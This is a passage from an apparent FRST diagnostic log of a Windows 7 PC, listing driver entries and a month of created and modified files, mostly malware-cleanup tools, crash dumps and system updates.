S1 MpKsl8c5a2e11; \??\c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{75D41F0A-42E8-498F-AC63-699978EC903E}\MpKsl8c5a2e11.sys [X]
S1 MpKsla09b7e5b; \??\c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{75D41F0A-42E8-498F-AC63-699978EC903E}\MpKsla09b7e5b.sys [X]
S3 taphss6; system32\DRIVERS\taphss6.sys [X]
S3 vtany; \??\C:\Windows\vtany.sys [X]

==================== NetSvcs (Whitelisted) ===================


(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-09-25 10:46 - 2014-09-25 10:46 - 00150568 _____ () C:\Windows\Minidump\092514-22401-01.dmp
2014-09-25 10:03 - 2014-09-25 10:51 - 00009693 _____ () C:\Users\Matts\Desktop\FRST.txt
2014-09-25 10:03 - 2014-09-25 10:03 - 00000000 ____D () C:\Users\Matts\Desktop\FRST-OlderVersion
2014-09-25 09:50 - 2014-09-25 09:53 - 00036927 _____ () C:\Users\Matts\Downloads\FRST.txt
2014-09-24 23:41 - 2014-09-24 23:40 - 00003231 _____ () C:\Users\Matts\Documents\attach.zip
2014-09-24 23:40 - 2014-09-24 23:40 - 00003231 _____ () C:\Users\Matts\Desktop\attach.zip
2014-09-24 23:24 - 2014-09-24 23:24 - 00000000 ____D () C:\Program Files\Mozilla Firefox
2014-09-24 22:56 - 2014-09-24 22:56 - 00144392 _____ () C:\Windows\Minidump\092414-11060-01.dmp
2014-09-24 22:52 - 2014-09-24 22:52 - 00150568 _____ () C:\Windows\Minidump\092414-15834-01.dmp
2014-09-24 22:41 - 2014-09-24 22:41 - 00144392 _____ () C:\Windows\Minidump\092414-12277-01.dmp
2014-09-24 22:40 - 2014-09-24 22:40 - 00003280 ____N () C:\bootsqm.dat
2014-09-24 09:36 - 2014-09-09 17:47 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2014-09-24 09:34 - 2014-09-24 09:34 - 00000000 ____D () C:\Users\Matts\Downloads\ProcessMonitor
2014-09-24 09:29 - 2014-09-24 09:29 - 01121208 _____ () C:\Users\Matts\Downloads\ProcessMonitor.zip
2014-09-24 00:06 - 2014-09-24 00:10 - 00000000 ____D () C:\Users\Matts\Downloads\ProcessExplorer
2014-09-24 00:05 - 2014-09-24 00:05 - 01188194 _____ () C:\Users\Matts\Downloads\ProcessExplorer.zip
2014-09-23 23:18 - 2014-09-23 23:18 - 00144392 _____ () C:\Windows\Minidump\092314-12776-01.dmp
2014-09-23 22:59 - 2014-09-23 22:59 - 00000207 _____ () C:\Windows\tweaking.com-regbackup-MATTS-PC-Microsoft-Windows-7-Professional-(32-bit).dat
2014-09-23 22:59 - 2014-09-23 22:59 - 00000000 ____D () C:\RegBackup
2014-09-23 22:49 - 2014-09-23 22:49 - 00002117 _____ () C:\Users\Matts\Desktop\Tweaking.com - Windows Repair (All in One).lnk
2014-09-23 22:49 - 2014-09-23 22:49 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tweaking.com
2014-09-23 22:49 - 2014-09-23 22:49 - 00000000 ____D () C:\Program Files\Tweaking.com
2014-09-23 22:48 - 2014-09-23 22:48 - 09690792 _____ () C:\Users\Matts\Downloads\tweaking.com_windows_repair_aio_setup.exe
2014-09-23 22:44 - 2014-09-23 22:44 - 00005635 _____ () C:\Windows\system32\jupdate-1.7.0_67-b01.log
2014-09-23 22:44 - 2014-09-23 22:44 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2014-09-23 22:44 - 2014-09-23 22:44 - 00000000 ____D () C:\Program Files\Common Files\Java
2014-09-23 22:44 - 2014-07-25 12:55 - 00096680 _____ (Oracle Corporation) C:\Windows\system32\WindowsAccessBridge.dll
2014-09-23 22:44 - 2014-07-25 12:49 - 00272808 _____ (Oracle Corporation) C:\Windows\system32\javaws.exe
2014-09-23 22:44 - 2014-07-25 12:49 - 00175528 _____ (Oracle Corporation) C:\Windows\system32\javaw.exe
2014-09-23 22:44 - 2014-07-25 12:49 - 00175528 _____ (Oracle Corporation) C:\Windows\system32\java.exe
2014-09-23 22:43 - 2014-09-23 22:43 - 00918440 _____ (Oracle Corporation) C:\Users\Matts\Downloads\jre-7u67-windows-i586-iftw.exe
2014-09-23 15:12 - 2014-09-23 15:12 - 00000633 _____ () C:\Users\Matts\Desktop\JRT.txt
2014-09-22 23:01 - 2014-09-22 23:01 - 02347384 _____ (ESET) C:\Users\Matts\Downloads\esetsmartinstaller_enu.exe
2014-09-22 23:01 - 2014-09-22 23:01 - 00000000 ____D () C:\Program Files\ESET
2014-09-22 22:34 - 2014-09-22 22:34 - 00000000 ____D () C:\Windows\ERUNT
2014-09-22 22:32 - 2014-09-22 22:33 - 01024790 _____ (Thisisu) C:\Users\Matts\Desktop\JRT.exe
2014-09-22 22:20 - 2014-09-22 22:20 - 01373475 _____ () C:\Users\Matts\Downloads\adwcleaner_3.310.exe
2014-09-22 21:28 - 2014-09-22 21:29 - 00448512 _____ (OldTimer Tools) C:\Users\Matts\Downloads\TFC.exe
2014-09-22 21:18 - 2014-09-22 21:18 - 00002040 _____ () C:\Users\Matts\Desktop\Rkill.txt
2014-09-22 21:09 - 2014-09-22 21:09 - 01944824 _____ (Bleeping Computer, LLC) C:\Users\Matts\Downloads\rkill.exe
2014-09-22 21:05 - 2014-09-22 21:14 - 00033900 _____ () C:\Users\Matts\Downloads\Result.txt
2014-09-22 21:04 - 2014-09-22 21:04 - 00401920 _____ (Farbar) C:\Users\Matts\Downloads\MiniToolBox.exe
2014-09-22 20:54 - 2014-09-22 20:54 - 00001063 _____ () C:\Users\Matts\Documents\malwarebytes922.txt
2014-09-22 20:50 - 2014-09-22 20:50 - 00002759 _____ () C:\Users\Matts\Downloads\FSS.txt
2014-09-22 20:49 - 2014-09-22 20:49 - 00415232 _____ (Farbar) C:\Users\Matts\Downloads\FSS.exe
2014-09-22 20:46 - 2014-09-22 20:46 - 00854417 _____ () C:\Users\Matts\Downloads\SecurityCheck.exe
2014-09-22 20:43 - 2014-09-22 20:43 - 00150568 _____ () C:\Windows\Minidump\092214-18049-01.dmp
2014-09-22 19:54 - 2014-09-22 19:55 - 14349744 _____ (Malwarebytes Corp.) C:\Users\Matts\Downloads\mbar-1.07.0.1012.exe
2014-09-22 19:31 - 2014-09-22 19:31 - 00150568 _____ () C:\Windows\Minidump\092214-12261-01.dmp
2014-09-22 18:54 - 2014-09-25 10:51 - 00000000 ____D () C:\FRST
2014-09-22 18:54 - 2014-09-25 10:03 - 01100800 _____ (Farbar) C:\Users\Matts\Desktop\FRST.exe
2014-09-22 15:30 - 2014-09-24 22:50 - 00014933 _____ () C:\Users\Matts\Desktop\dds.txt
2014-09-22 15:30 - 2014-09-24 22:50 - 00013684 _____ () C:\Users\Matts\Desktop\attach.txt
2014-09-22 15:24 - 2014-09-22 15:24 - 00688992 ____R (Swearware) C:\Users\Matts\Downloads\dds.com
2014-09-22 15:21 - 2014-09-25 10:46 - 253082706 _____ () C:\Windows\MEMORY.DMP
2014-09-22 15:21 - 2014-09-22 15:21 - 00150568 _____ () C:\Windows\Minidump\092214-14554-01.dmp
2014-09-21 18:52 - 2014-09-21 18:52 - 00000000 ____D () C:\Program Files\Broadcom
2014-09-21 18:49 - 2014-09-21 18:49 - 00000000 ____D () C:\Windows\system32\SRSLabs
2014-09-21 18:49 - 2009-06-29 12:44 - 12021852 _____ (IDT, Inc.) C:\Windows\system32\idtcpl.cpl
2014-09-21 18:49 - 2009-06-29 12:44 - 03600384 _____ (IDT, Inc.) C:\Windows\system32\stlang.dll
2014-09-21 18:49 - 2009-06-29 12:44 - 00536576 _____ (IDT, Inc.) C:\Windows\system32\idtmini1.exe
2014-09-21 18:49 - 2009-05-12 14:26 - 00047104 _____ (Creative Technology Ltd.) C:\Windows\system32\ctppld.dll
2014-09-21 18:49 - 2009-05-12 14:25 - 00511488 _____ (Creative Technology Ltd.) C:\Windows\system32\ctapo32.dll
2014-09-21 18:49 - 2009-03-02 12:57 - 00142848 _____ (Andrea Electronics Corporation) C:\Windows\system32\aestacap.dll
2014-09-21 18:49 - 2009-03-02 12:57 - 00061440 _____ (Andrea Electronics Corporation) C:\Windows\system32\aestaren.dll
2014-09-21 18:49 - 2009-03-02 12:47 - 00086016 _____ (Andrea Electronics Corporation) C:\Windows\system32\AESTCom.dll
2014-09-21 18:49 - 2009-03-02 12:08 - 00368640 _____ (Andrea Electronics Corporation) C:\Windows\system32\aestecap.dll
2014-09-21 18:48 - 2014-09-21 18:50 - 00000000 ____D () C:\Program Files\IDT
2014-09-21 18:48 - 2009-06-29 12:44 - 00914944 _____ (IDT, Inc.) C:\Windows\system32\stapo.dll
2014-09-21 18:48 - 2009-06-29 12:44 - 00485888 ____N (IDT, Inc.) C:\Windows\system32\stapi32.dll
2014-09-21 18:48 - 2009-06-29 12:44 - 00408576 _____ (IDT, Inc.) C:\Windows\system32\Drivers\stwrt.sys
2014-09-21 18:48 - 2009-06-29 12:44 - 00405504 _____ (IDT, Inc.) C:\Windows\system32\stcplx.dll
2014-09-21 18:48 - 2009-06-29 12:44 - 00175616 _____ (IDT, Inc.) C:\Windows\system32\st326217.dll
2014-09-21 18:43 - 2014-09-21 18:43 - 16906128 _____ () C:\Users\Matts\Downloads\R226903.exe
2014-09-21 18:42 - 2014-09-21 18:43 - 29222800 _____ () C:\Users\Matts\Downloads\R232587.exe
2014-09-21 18:42 - 2014-09-21 18:43 - 18620936 _____ () C:\Users\Matts\Downloads\R258891.exe
2014-09-21 17:41 - 2014-09-21 17:41 - 00000000 ____D () C:\Users\Matts\AppData\Roaming\Dell
2014-09-21 17:40 - 2014-09-21 19:08 - 00000000 ____D () C:\ProgramData\PCDr
2014-09-21 17:40 - 2014-09-21 17:40 - 00000000 ____D () C:\ProgramData\PC-Doctor for Windows
2014-09-21 17:40 - 2014-09-21 17:40 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dell
2014-09-21 17:40 - 2014-09-21 17:40 - 00000000 ____D () C:\Program Files\Dell Support Center
2014-09-21 17:15 - 2014-09-21 17:40 - 00000000 ____D () C:\Program Files\My Dell
2014-09-21 17:00 - 2014-09-21 19:08 - 00000000 ____D () C:\Users\Matts\AppData\Roaming\PCDr
2014-09-21 17:00 - 2014-09-21 19:02 - 00000000 ____D () C:\temp
2014-09-21 16:59 - 2014-09-21 16:59 - 00000000 ____D () C:\Users\Matts\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dell
2014-09-21 16:58 - 2014-09-21 16:58 - 00420552 _____ () C:\Users\Matts\Downloads\DellSystemDetect.exe
2014-09-21 16:56 - 2014-09-21 16:56 - 00000000 ____D () C:\Users\Matts\AppData\Local\Microsoft_Corporation
2014-09-20 15:47 - 2014-09-24 08:49 - 00001324 _____ () C:\Windows\PFRO.log
2014-09-20 15:30 - 2014-09-22 22:30 - 00000000 ____D () C:\AdwCleaner
2014-09-20 12:08 - 2014-09-20 12:08 - 00000017 _____ () C:\Users\Matts\AppData\Local\resmon.resmoncfg
2014-09-20 08:36 - 2014-09-25 00:17 - 00000000 ____D () C:\Users\Matts\AppData\Local\CrashDumps
2014-09-20 08:16 - 2014-09-20 08:16 - 00002617 _____ () C:\Users\Matts\Downloads\download.dlm
2014-09-20 00:36 - 2014-09-25 10:46 - 00002007 _____ () C:\Windows\setupact.log
2014-09-20 00:36 - 2014-09-20 00:36 - 00000000 _____ () C:\Windows\setuperr.log
2014-09-19 23:38 - 2014-09-19 23:38 - 00000000 ____D () C:\NPE
2014-09-19 23:26 - 2014-09-19 23:54 - 00000000 ____D () C:\Users\Matts\AppData\Local\NPE
2014-09-19 23:26 - 2014-09-19 23:26 - 00000000 ____D () C:\ProgramData\Norton
2014-09-14 20:35 - 2014-09-22 20:07 - 00000000 ____D () C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2014-09-14 20:34 - 2014-09-22 20:07 - 00000000 ____D () C:\Users\Matts\Desktop\mbar
2014-09-14 18:51 - 2014-09-14 18:51 - 00000965 _____ () C:\Users\Public\Desktop\CCleaner.lnk
2014-09-14 18:51 - 2014-09-14 18:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2014-09-14 18:19 - 2014-09-22 20:52 - 00110296 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-09-14 18:19 - 2014-09-22 19:55 - 00075480 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-09-14 18:19 - 2014-09-14 18:19 - 00001060 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-09-14 18:19 - 2014-09-14 18:19 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-09-14 18:19 - 2014-09-14 18:19 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-09-14 18:19 - 2014-05-12 07:26 - 00051928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-09-13 18:39 - 2014-08-18 17:57 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-09-13 18:39 - 2014-08-18 17:57 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-09-13 18:39 - 2014-08-18 17:46 - 00454656 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-09-13 18:39 - 2014-08-18 17:45 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-09-13 18:39 - 2014-08-18 17:44 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-09-13 18:39 - 2014-08-18 17:44 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-09-13 18:39 - 2014-08-18 17:39 - 00043008 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-09-13 18:39 - 2014-08-18 17:39 - 00032768 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-09-13 18:39 - 2014-08-18 17:37 - 00440320 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-09-13 18:39 - 2014-08-18 17:36 - 00112128 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-09-13 18:39 - 2014-08-18 17:36 - 00108032 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-09-13 18:39 - 2014-08-18 17:35 - 00597504 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-09-13 18:39 - 2014-08-18 17:30 - 00646144 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-09-13 18:39 - 2014-08-18 17:27 - 00365056 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-09-13 18:39 - 2014-08-18 17:22 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-09-13 18:39 - 2014-08-18 17:19 - 00164864 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-09-13 18:39 - 2014-08-18 17:17 - 00243200 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-09-13 18:39 - 2014-08-18 17:17 - 00069632 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-09-13 18:39 - 2014-08-18 17:09 - 00603136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-09-13 18:39 - 2014-08-18 17:08 - 00673792 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-09-13 18:39 - 2014-08-18 17:07 - 01068032 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-09-13 18:39 - 2014-08-18 16:36 - 00678400 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-09-13 18:38 - 2014-08-19 13:39 - 00327872 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-09-13 18:38 - 2014-08-18 18:26 - 17455104 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-09-13 18:38 - 2014-08-18 18:08 - 04232704 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-09-13 18:38 - 2014-08-18 17:42 - 02185728 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-09-13 18:38 - 2014-08-18 17:15 - 11769856 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-09-13 18:38 - 2014-08-18 17:08 - 02014208 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-09-13 18:38 - 2014-08-18 16:46 - 01812992 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-09-13 18:38 - 2014-08-18 16:38 - 01190400 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-09-13 18:34 - 2014-06-26 21:45 - 02285056 _____ (Microsoft Corporation) C:\Windows\system32\msmpeg2vdec.dll
2014-09-11 23:08 - 2014-09-11 23:08 - 00000000 ____D () C:\958f45868474b8ea08185f0d725a
2014-09-10 21:02 - 2014-08-01 07:35 - 00793600 _____ (Microsoft Corporation) C:\Windows\system32\TSWorkspace.dll
2014-09-10 21:02 - 2014-07-06 21:40 - 01059840 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2014-09-10 21:02 - 2014-07-06 21:40 - 00550912 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2014-09-10 21:02 - 2014-06-23 22:59 - 01987584 _____ (Microsoft Corporation) C:\Windows\system32\d3d10warp.dll
2014-09-02 14:26 - 2014-08-22 21:46 - 00305152 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2014-09-02 14:26 - 2014-08-22 20:42 - 02352640 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-08-27 15:08 - 2014-08-27 15:08 - 00000000 __SHD () C:\Users\Matts\AppData\Local\EmieUserList
2014-08-27 15:08 - 2014-08-27 15:08 - 00000000 __SHD () C:\Users\Matts\AppData\Local\EmieSiteList

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-09-25 10:51 - 2014-09-25 10:03 - 00009693 _____ () C:\Users\Matts\Desktop\FRST.txt
2014-09-25 10:51 - 2014-09-22 18:54 - 00000000 ____D () C:\FRST
2014-09-25 10:50 - 2010-11-20 17:01 - 00006206 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-09-25 10:48 - 2009-07-14 00:34 - 00022096 _____ () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-09-25 10:48 - 2009-07-14 00:34 - 00022096 _____ () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-09-25 10:46 - 2014-09-25 10:46 - 00150568 _____ () C:\Windows\Minidump\092514-22401-01.dmp
2014-09-25 10:46 - 2014-09-22 15:21 - 253082706 _____ () C:\Windows\MEMORY.DMP
2014-09-25 10:46 - 2014-09-20 00:36 - 00002007 _____ () C:\Windows\setupact.log
2014-09-25 10:46 - 2013-08-25 22:02 - 00000000 ____D () C:\Program Files\Mozilla Maintenance Service
2014-09-25 10:46 - 2012-10-09 23:28 - 00000000 ____D () C:\Windows\Minidump
2014-09-25 10:46 - 2009-07-14 00:53 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-09-25 10:15 - 2012-10-09 22:42 - 01515758 _____ () C:\Windows\WindowsUpdate.log
2014-09-25 10:03 - 2014-09-25 10:03 - 00000000 ____D () C:\Users\Matts\Desktop\FRST-OlderVersion
2014-09-25 10:03 - 2014-09-22 18:54 - 01100800 _____ (Farbar) C:\Users\Matts\Desktop\FRST.exe
2014-09-25 09:53 - 2014-09-25 09:50 - 00036927 _____ () C:\Users\Matts\Downloads\FRST.txt
2014-09-25 00:17 - 2014-09-20 08:36 - 00000000 ____D () C:\Users\Matts\AppData\Local\CrashDumps
2014-09-24 23:40 - 2014-09-24 23:41 - 00003231 _____ () C:\Users\Matts\Documents\attach.zip
2014-09-24 23:40 - 2014-09-24 23:40 - 00003231 _____ () C:\Users\Matts\Desktop\attach.zip
2014-09-24 23:24 - 2014-09-24 23:24 - 00000000 ____D () C:\Program Files\Mozilla Firefox
2014-09-24 22:56 - 2014-09-24 22:56 - 00144392 _____ () C:\Windows\Minidump\092414-11060-01.dmp
2014-09-24 22:52 - 2014-09-24 22:52 - 00150568 _____ () C:\Windows\Minidump\092414-15834-01.dmp
2014-09-24 22:50 - 2014-09-22 15:30 - 00014933 _____ () C:\Users\Matts\Desktop\dds.txt
2014-09-24 22:50 - 2014-09-22 15:30 - 00013684 _____ () C:\Users\Matts\Desktop\attach.txt
2014-09-24 22:41 - 2014-09-24 22:41 - 00144392 _____ () C:\Windows\Minidump\092414-12277-01.dmp
2014-09-24 22:40 - 2014-09-24 22:40 - 00003280 ____N () C:\bootsqm.dat
2014-09-24 09:34 - 2014-09-24 09:34 - 00000000 ____D () C:\Users\Matts\Downloads\ProcessMonitor
2014-09-24 09:29 - 2014-09-24 09:29 - 01121208 _____ () C:\Users\Matts\Downloads\ProcessMonitor.zip
2014-09-24 08:49 - 2014-09-20 15:47 - 00001324 _____ () C:\Windows\PFRO.log
2014-09-24 08:49 - 2012-10-09 23:14 - 00109280 _____ () C:\Users\Matts\AppData\Local\GDIPFONTCACHEV1.DAT
2014-09-24 08:49 - 2011-04-11 22:24 - 00000000 ____D () C:\Windows\CSC
2014-09-24 08:49 - 2009-07-14 00:33 - 00408000 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-09-24 01:19 - 2009-07-13 22:37 - 00000000 ____D () C:\Windows\system32\GroupPolicy
2014-09-24 00:10 - 2014-09-24 00:06 - 00000000 ____D () C:\Users\Matts\Downloads\ProcessExplorer
2014-09-24 00:05 - 2014-09-24 00:05 - 01188194 _____ () C:\Users\Matts\Downloads\ProcessExplorer.zip
2014-09-23 23:18 - 2014-09-23 23:18 - 00144392 _____ () C:\Windows\Minidump\092314-12776-01.dmp
2014-09-23 23:09 - 2009-07-13 22:04 - 00000855 _____ () C:\Windows\system32\Drivers\etc\hosts_bak_621
2014-09-23 22:59 - 2014-09-23 22:59 - 00000207 _____ () C:\Windows\tweaking.com-regbackup-MATTS-PC-Microsoft-Windows-7-Professional-(32-bit).dat
2014-09-23 22:59 - 2014-09-23 22:59 - 00000000 ____D () C:\RegBackup
2014-09-23 22:49 - 2014-09-23 22:49 - 00002117 _____ () C:\Users\Matts\Desktop\Tweaking.com - Windows Repair (All in One).lnk
2014-09-23 22:49 - 2014-09-23 22:49 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tweaking.com
2014-09-23 22:49 - 2014-09-23 22:49 - 00000000 ____D () C:\Program Files\Tweaking.com
2014-09-23 22:48 - 2014-09-23 22:48 - 09690792 _____ () C:\Users\Matts\Downloads\tweaking.com_windows_repair_aio_setup.exe
2014-09-23 22:44 - 2014-09-23 22:44 - 00005635 _____ () C:\Windows\system32\jupdate-1.7.0_67-b01.log
2014-09-23 22:44 - 2014-09-23 22:44 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2014-09-23 22:44 - 2014-09-23 22:44 - 00000000 ____D () C:\Program Files\Common Files\Java
2014-09-23 22:44 - 2013-11-26 15:08 - 00000000 ____D () C:\ProgramData\Oracle
2014-09-23 22:44 - 2012-10-10 15:58 - 00000000 ____D () C:\Program Files\Java
2014-09-23 22:43 - 2014-09-23 22:43 - 00918440 _____ (Oracle Corporation) C:\Users\Matts\Downloads\jre-7u67-windows-i586-iftw.exe
2014-09-23 15:12 - 2014-09-23 15:12 - 00000633 _____ () C:\Users\Matts\Desktop\JRT.txt
2014-09-22 23:01 - 2014-09-22 23:01 - 02347384 _____ (ESET) C:\Users\Matts\Downloads\esetsmartinstaller_enu.exe
2014-09-22 23:01 - 2014-09-22 23:01 - 00000000 ____D () C:\Program Files\ESET
2014-09-22 22:34 - 2014-09-22 22:34 - 00000000 ____D () C:\Windows\ERUNT
2014-09-22 22:33 - 2014-09-22 22:32 - 01024790 _____ (Thisisu) C:\Users\Matts\Desktop\JRT.exe
2014-09-22 22:30 - 2014-09-20 15:30 - 00000000 ____D () C:\AdwCleaner
2014-09-22 22:20 - 2014-09-22 22:20 - 01373475 _____ () C:\Users\Matts\Downloads\adwcleaner_3.310.exe
2014-09-22 21:29 - 2014-09-22 21:28 - 00448512 _____ (OldTimer Tools) C:\Users\Matts\Downloads\TFC.exe
2014-09-22 21:18 - 2014-09-22 21:18 - 00002040 _____ () C:\Users\Matts\Desktop\Rkill.txt
2014-09-22 21:14 - 2014-09-22 21:05 - 00033900 _____ () C:\Users\Matts\Downloads\Result.txt
2014-09-22 21:09 - 2014-09-22 21:09 - 01944824 _____ (Bleeping Computer, LLC) C:\Users\Matts\Downloads\rkill.exe
2014-09-22 21:04 - 2014-09-22 21:04 - 00401920 _____ (Farbar) C:\Users\Matts\Downloads\MiniToolBox.exe
2014-09-22 20:54 - 2014-09-22 20:54 - 00001063 _____ () C:\Users\Matts\Documents\malwarebytes922.txt
2014-09-22 20:52 - 2014-09-14 18:19 - 00110296 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-09-22 20:50 - 2014-09-22 20:50 - 00002759 _____ () C:\Users\Matts\Downloads\FSS.txt
2014-09-22 20:49 - 2014-09-22 20:49 - 00415232 _____ (Farbar) C:\Users\Matts\Downloads\FSS.exe
2014-09-22 20:46 - 2014-09-22 20:46 - 00854417 _____ () C:\Users\Matts\Downloads\SecurityCheck.exe
2014-09-22 20:43 - 2014-09-22 20:43 - 00150568 _____ () C:\Windows\Minidump\092214-18049-01.dmp
2014-09-22 20:07 - 2014-09-14 20:35 - 00000000 ____D () C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2014-09-22 20:07 - 2014-09-14 20:34 - 00000000 ____D () C:\Users\Matts\Desktop\mbar
2014-09-22 19:55 - 2014-09-22 19:54 - 14349744 _____ (Malwarebytes Corp.) C:\Users\Matts\Downloads\mbar-1.07.0.1012.exe
2014-09-22 19:55 - 2014-09-14 18:19 - 00075480 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-09-22 19:31 - 2014-09-22 19:31 - 00150568 _____ () C:\Windows\Minidump\092214-12261-01.dmp
2014-09-22 15:24 - 2014-09-22 15:24 - 00688992 ____R (Swearware) C:\Users\Matts\Downloads\dds.com
2014-09-22 15:22 - 2012-10-09 22:51 - 00000000 ____D () C:\Users\Matts
2014-09-22 15:21 - 2014-09-22 15:21 - 00150568 _____ () C:\Windows\Minidump\092214-14554-01.dmp
2014-09-22 02:41 - 2012-10-09 22:57 - 00231568 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2014-09-21 19:08 - 2014-09-21 17:40 - 00000000 ____D () C:\ProgramData\PCDr
2014-09-21 19:08 - 2014-09-21 17:00 - 00000000 ____D () C:\Users\Matts\AppData\Roaming\PCDr
2014-09-21 19:03 - 2012-10-10 18:18 - 00000000 ____D () C:\Users\Matts\AppData\Local\Deployment
2014-09-21 19:02 - 2014-09-21 17:00 - 00000000 ____D () C:\temp
2014-09-21 18:52 - 2014-09-21 18:52 - 00000000 ____D () C:\Program Files\Broadcom
2014-09-21 18:50 - 2014-09-21 18:48 - 00000000 ____D () C:\Program Files\IDT
2014-09-21 18:49 - 2014-09-21 18:49 - 00000000 ____D () C:\Windows\system32\SRSLabs
2014-09-21 18:48 - 2013-10-28 10:27 - 00000000 ____D () C:\Program Files\InstallShield Installation Information
2014-09-21 18:43 - 2014-09-21 18:43 - 16906128 _____ () C:\Users\Matts\Downloads\R226903.exe
2014-09-21 18:43 - 2014-09-21 18:42 - 29222800 _____ () C:\Users\Matts\Downloads\R232587.exe
2014-09-21 18:43 - 2014-09-21 18:42 - 18620936 _____ () C:\Users\Matts\Downloads\R258891.exe
2014-09-21 17:41 - 2014-09-21 17:41 - 00000000 ____D () C:\Users\Matts\AppData\Roaming\Dell
2014-09-21 17:40 - 2014-09-21 17:40 - 00000000 ____D () C:\ProgramData\PC-Doctor for Windows
2014-09-21 17:40 - 2014-09-21 17:40 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dell
2014-09-21 17:40 - 2014-09-21 17:40 - 00000000 ____D () C:\Program Files\Dell Support Center
2014-09-21 17:40 - 2014-09-21 17:15 - 00000000 ____D () C:\Program Files\My Dell
2014-09-21 16:59 - 2014-09-21 16:59 - 00000000 ____D () C:\Users\Matts\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dell
2014-09-21 16:58 - 2014-09-21 16:58 - 00420552 _____ () C:\Users\Matts\Downloads\DellSystemDetect.exe
2014-09-21 16:56 - 2014-09-21 16:56 - 00000000 ____D () C:\Users\Matts\AppData\Local\Microsoft_Corporation
2014-09-21 16:44 - 2012-10-09 22:51 - 00000000 __SHD () C:\Recovery
2014-09-20 12:08 - 2014-09-20 12:08 - 00000017 _____ () C:\Users\Matts\AppData\Local\resmon.resmoncfg
2014-09-20 08:16 - 2014-09-20 08:16 - 00002617 _____ () C:\Users\Matts\Downloads\download.dlm
2014-09-20 00:36 - 2014-09-20 00:36 - 00000000 _____ () C:\Windows\setuperr.log
2014-09-20 00:36 - 2009-07-14 00:53 - 00032580 _____ () C:\Windows\Tasks\SCHEDLGU.TXT
